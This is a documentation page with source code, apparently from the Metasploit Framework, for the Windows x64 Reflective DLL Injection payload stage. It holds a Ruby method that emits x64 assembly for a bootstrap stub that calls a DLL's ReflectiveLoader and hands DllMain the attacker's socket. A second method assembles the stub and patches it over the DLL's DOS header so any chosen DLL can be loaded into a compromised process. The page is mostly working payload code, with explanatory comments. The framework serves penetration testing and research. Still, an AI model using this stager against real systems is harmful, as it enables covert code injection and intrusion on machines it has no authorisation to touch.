Module: Msf::Payload::Windows::ReflectiveDllInject_x64
- Includes:
- Msf::Payload::Windows, ReflectiveDLLLoader
- Defined in:
- lib/msf/core/payload/windows/x64/reflective_dll_inject_x64.rb
Constant Summary
Constants included from ReflectiveDLLLoader
ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER
Instance Method Summary
- #asm_invoke_dll(opts = {}) ⇒ Object
- #initialize(info = {}) ⇒ Object
- #library_path ⇒ Object
- #stage_payload(opts = {}) ⇒ Object
Methods included from Msf::Payload::Windows
#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #replace_var
Methods included from PrependMigrate
#apply_prepend_migrate, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64
Methods included from ReflectiveDLLLoader
#load_rdi_dll, #load_rdi_dll_from_data
Instance Method Details
#asm_invoke_dll(opts = {}) ⇒ Object
# File 'lib/msf/core/payload/windows/x64/reflective_dll_inject_x64.rb', line 40
# Builds the x64 assembly source for the bootstrap stub that stage_payload
# patches over the start of the DLL's DOS header. Only the assembly text is
# produced here; assembling it is left to the caller.
#
# The stub re-emits the 'MZ' magic (which, per the comment below, decodes as
# "pop r10" on x64 so execution can begin at offset 0), locates itself with a
# call/pop, adds the distance to ReflectiveLoader(), calls it, and then calls
# the returned DllMain twice (attach with the socket, then detach with the
# exitfunk value). The 0x15 subtracted from :rdi_offset is presumably the
# byte length of the instructions preceding `pop rbx`, so that rbx ends up at
# DLL base + :rdi_offset — worth re-checking if the prologue is ever edited.
#
# @param opts [Hash] :rdi_offset — offset of ReflectiveLoader() within the
#   DLL (stage_payload passes the value returned by load_rdi_dll);
#   :exitfunk — key into Msf::Payload::Windows.exit_types used for the
#   detach call.
# @return [String] assembly source for the bootstrap (Metasm syntax, as
#   assembled by stage_payload).
# @raise [TypeError] when opts[:exitfunk] is not a key of exit_types: the
#   lookup yields nil and "0x%.8x" % nil fails. A missing :rdi_offset fails
#   on the subtraction instead.
def asm_invoke_dll(opts={})
  asm = %Q^
    ; prologue
    db 0x4d, 0x5a         ; 'MZ' = "pop r10"
    push r10              ; back to where we started
    push rbp              ; save rbp
    mov rbp, rsp          ; set up a new stack frame
    sub rsp, 32           ; allocate some space for calls.
    and rsp, ~0xF         ; Ensure RSP is 16 byte aligned
    ; GetPC
    call $+5              ; relative call to get location
    pop rbx               ; pop return value
    ; Invoke ReflectiveLoader()
    ; add the offset to ReflectiveLoader()
    add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x15)}
    call rbx              ; invoke ReflectiveLoader()
    ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
    ; offset from ReflectiveLoader() to the end of the DLL
    mov r8, rdi           ; r8 contains the socket
    mov rbx, rax          ; save DllMain for another call
    push 4                ; push up 4, indicate that we have attached
    pop rdx               ; pop 4 into rdx
    call rbx              ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
    ; Invoke DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
    ; push the exitfunk value onto the stack
    mov r8d, #{"0x%.8x" % Msf::Payload::Windows.exit_types[opts[:exitfunk]]}
    push 5                ; push 5, indicate that we have detached
    pop rdx               ; pop 5 into rdx
    call rbx              ; call DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
  ^
end
#initialize(info = {}) ⇒ Object
# File 'lib/msf/core/payload/windows/x64/reflective_dll_inject_x64.rb', line 18
# Describes the stage to the framework (name, author, references, platform,
# architecture and the 'sockrdi' calling convention it expects from the
# stager) and registers the single required DLL option.
#
# @param info [Hash] module info supplied by the including payload, merged
#   via update_info before being handed to super.
def initialize(info = {})
  details = {
    'Name'          => 'Reflective DLL Injection',
    'Description'   => 'Inject a DLL via a reflective loader',
    'Author'        => [ 'sf' ],
    'References'    => [
      [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
      [ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ]        # customisations
    ],
    'Platform'      => 'win',
    'Arch'          => ARCH_X64,
    'PayloadCompat' => { 'Convention' => 'sockrdi' },
    'Stage'         => { 'Payload' => "" }
  }
  super(update_info(info, details))

  # The rendered page lost the method name in front of this call; it is the
  # standard register_options from Msf::Module::Options.
  dll_option = OptPath.new('DLL', [ true, "The local path to the Reflective DLL to upload" ])
  register_options([ dll_option ], self.class)
end
#library_path ⇒ Object
# File 'lib/msf/core/payload/windows/x64/reflective_dll_inject_x64.rb', line 36
# Local path of the reflective DLL to stage, read from the DLL datastore
# option registered in initialize.
#
# @return [Object] whatever the datastore holds under the 'DLL' key
def library_path
  option_name = 'DLL'
  datastore[option_name]
end
#stage_payload(opts = {}) ⇒ Object
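# File 'lib/msf/core/payload/windows/x64/reflective_dll_inject_x64.rb', line 72
# Builds the stage: the reflective DLL from library_path with the assembled
# x64 bootstrap stub patched over the start of its DOS header.
#
# @param opts [Hash] unused here; kept for interface compatibility with the
#   other stage_payload implementations.
# @return [String] the DLL bytes with the bootstrap in place.
# @raise [RuntimeError] if the assembled bootstrap would spill into e_lfanew.
def stage_payload(opts = {})
  # Exceptions will be raised by the mixin if there are issues loading the DLL.
  dll, offset = load_rdi_dll(library_path)

  asm_opts = {
    rdi_offset: offset,
    exitfunk: 'thread' # default to 'thread' for migration
  }
  asm = asm_invoke_dll(asm_opts)

  # generate the bootstrap asm
  bootstrap = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string

  # The bootstrap lives in the DOS header and must stop before e_lfanew, which
  # IMAGE_DOS_HEADER places at offset 0x3C (60). The previous bound of 62
  # would have let a 61- or 62-byte stub overwrite the first two bytes of
  # e_lfanew, which the loader needs to find the PE header.
  e_lfanew_offset = 0x3C
  if bootstrap.length > e_lfanew_offset
    raise RuntimeError, "Reflective DLL Injection (x64) generated an oversized bootstrap!"
  end

  # patch the bootstrap code into the dll's DOS header...
  dll[0, bootstrap.length] = bootstrap
  dll
end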